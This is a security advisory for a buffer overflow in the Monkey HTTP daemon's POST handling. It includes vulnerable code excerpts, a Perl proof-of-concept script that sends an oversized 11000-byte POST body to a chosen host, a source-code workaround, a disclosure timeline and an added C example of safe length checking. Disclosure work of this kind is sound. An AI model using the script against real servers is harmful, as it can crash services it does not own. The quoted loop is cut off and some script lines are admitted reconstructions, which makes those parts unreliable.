Monkey HTTP Daemon Remote Buffer Overflow

ABSTRACT

"Monkey is a Web server written in C that works under Linux. This is an open source project based on the HTTP/1.1 protocol. The objective is to develop a fast, efficient, small and easy to configure web server." (quote from http://monkeyd.sourceforge.net)

DESCRIPTION

A buffer overflow vulnerability exists in Monkey's handling of forms submitted with the POST request method. The unchecked buffer lies in the PostMethod() procedure. The buffer allocated on line 3 of PostMethod():

    char buffer[MAX_REQUEST_BODY];

is of size MAX_REQUEST_BODY, which is defined as follows in monkey.h:

    #define MAX_REQUEST_BODY 10240 /* Maximum request buffer */

The security check on line 10 of the procedure:

    if(content_length_post<=0){

is flawed: it rejects only non-positive lengths and never compares content_length_post against the size of buffer, so a client-supplied Content-Length larger than MAX_REQUEST_BODY passes the check. This results in a buffer overflow inside the loop below:

    memset(buffer,'\0',sizeof(buffer));
    for(i=4;i
    [the remainder of the loop did not survive in this copy of the advisory]

EXPLOIT

The following proof of concept sends a POST request whose declared and actual body length (11000 bytes) exceeds MAX_REQUEST_BODY. The lines that read the target host, the IO::Socket import and the trim() helper did not survive in this copy and are restored below with assumed wording.

    #!/usr/bin/perl
    use IO::Socket;

    # strip leading and trailing whitespace (helper not preserved in this copy)
    sub trim {
        my $s = shift;
        $s =~ s/^\s+|\s+$//g;
        return $s;
    }

    # host prompt restored with assumed wording
    print STDOUT "What host to connect to \[localhost\]\: ";
    chomp($line = <STDIN>);
    $host = trim($line);
    print STDOUT "What port to connect to \[80\]\: ";
    chomp($line = <STDIN>);
    $port = trim($line);
    $addr = "$host\:$port";
    print STDOUT "What script to submit to \[\/cgi-bin\/test\.pl\]\: ";
    chomp($line = <STDIN>);
    $script = trim($line);
    $buffer = "A"x11000;
    $exploit = "POST /$script HTTP/1.0\r\n";
    $exploit.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $exploit.= "Content-Length: 11000\r\n\r\n";
    $exploit.= "$buffer\r\n\r\n";
    $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr)
        or die "connect to $addr failed: $!";
    print $f $exploit;
    sleep 5;
    undef $f;

WORKAROUND

In monkey.c, replace the line:

    if(content_length_post<=0){

with:

    if(content_length_post<=0 || content_length_post >= MAX_REQUEST_BODY){

Stop the server, re-build your binary, and restart the server.

VENDOR RESPONSE

The vendor was contacted on March 15; a fix was made public 9 days later, on March 24. The fixed version, Monkey 0.6.2, is available at:

Package TAR/GZ: http://monkeyd.sourceforge.net/get_monkey.php?ver=4

Debian packages (unofficially maintained by Mattias Fernandez) have not been updated as of the time of writing.
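As an added example (not Monkey's code and not part of the original advisory), the C program below puts the check quoted in DESCRIPTION next to the one the WORKAROUND substitutes, and shows a POST body reader that validates the declared Content-Length both against the fixed buffer size and against the number of bytes that actually arrived. The function names, the status enum and the sample 11000-byte body are assumptions constructed for the example; only MAX_REQUEST_BODY and the two comparison expressions come from the advisory.

```c
/* Added example, not Monkey's source: Content-Length validation for a
 * fixed-size POST body buffer. MAX_REQUEST_BODY matches monkey.h. */
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_BODY 10240

/* Result codes for the hypothetical body reader (names assumed). */
enum post_status {
    POST_OK = 0,
    POST_EMPTY = -1,      /* non-positive Content-Length */
    POST_TOO_LARGE = -2,  /* Content-Length would not fit the buffer */
    POST_TRUNCATED = -3   /* client declared more than it sent */
};

/* The check as the advisory quotes it: rejects only non-positive lengths,
 * so a Content-Length larger than the buffer is accepted. */
static int flawed_length_ok(long content_length_post)
{
    if (content_length_post <= 0) return 0;
    return 1;
}

/* The check as the WORKAROUND rewrites it: also rejects any length that
 * would reach or exceed the buffer (>= leaves room for a NUL terminator). */
static int fixed_length_ok(long content_length_post)
{
    if (content_length_post <= 0 || content_length_post >= MAX_REQUEST_BODY) return 0;
    return 1;
}

/* Copy a declared-length body into a fixed buffer. 'avail' is the number of
 * bytes actually received, so a client that declares more than it sends
 * cannot make the copy read past the end of src. */
static enum post_status read_post_body(const char *src, size_t avail,
                                       long content_length_post,
                                       char buffer[MAX_REQUEST_BODY])
{
    memset(buffer, '\0', MAX_REQUEST_BODY);
    if (content_length_post <= 0) return POST_EMPTY;
    if (content_length_post >= MAX_REQUEST_BODY) return POST_TOO_LARGE;
    if ((size_t)content_length_post > avail) return POST_TRUNCATED;
    memcpy(buffer, src, (size_t)content_length_post); /* last byte stays NUL */
    return POST_OK;
}

/* Constructed sample: a body of 'A's, sized like the advisory's PoC (11000
 * bytes). declared_len is what the Content-Length header claims, sent_len
 * how many bytes the client really transmitted. */
static enum post_status demo_post(long declared_len, size_t sent_len)
{
    static char body[11000];
    static char buffer[MAX_REQUEST_BODY];
    memset(body, 'A', sizeof body);
    if (sent_len > sizeof body) sent_len = sizeof body;
    return read_post_body(body, sent_len, declared_len, buffer);
}

int main(void)
{
    printf("flawed check accepts Content-Length 11000: %d\n", flawed_length_ok(11000));
    printf("fixed check accepts Content-Length 11000:  %d\n", fixed_length_ok(11000));
    printf("demo_post(11000, 11000) -> %d (POST_TOO_LARGE is %d)\n",
           demo_post(11000, 11000), POST_TOO_LARGE);
    printf("demo_post(100, 100)     -> %d (POST_OK is %d)\n",
           demo_post(100, 100), POST_OK);
    printf("demo_post(100, 50)      -> %d (POST_TRUNCATED is %d)\n",
           demo_post(100, 50), POST_TRUNCATED);
    return 0;
}
```

The second guard in read_post_body (declared length versus bytes received) is not in the advisory's workaround; it is included because the same class of bug recurs when the declared length is trusted for the copy even after the buffer-size check passes.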
DISCLOSURE TIMELINE

March 15, 2003: Initial developer notification
March 18, 2003: Response from Eduardo Silva (edsiper@yahoo.es) indicates that the vulnerability will be fixed by March 24
March 23, 2003: Final contacts with developer
March 24, 2003: Monkey HTTPd 0.6.2 released
April 20, 2003: Public disclosure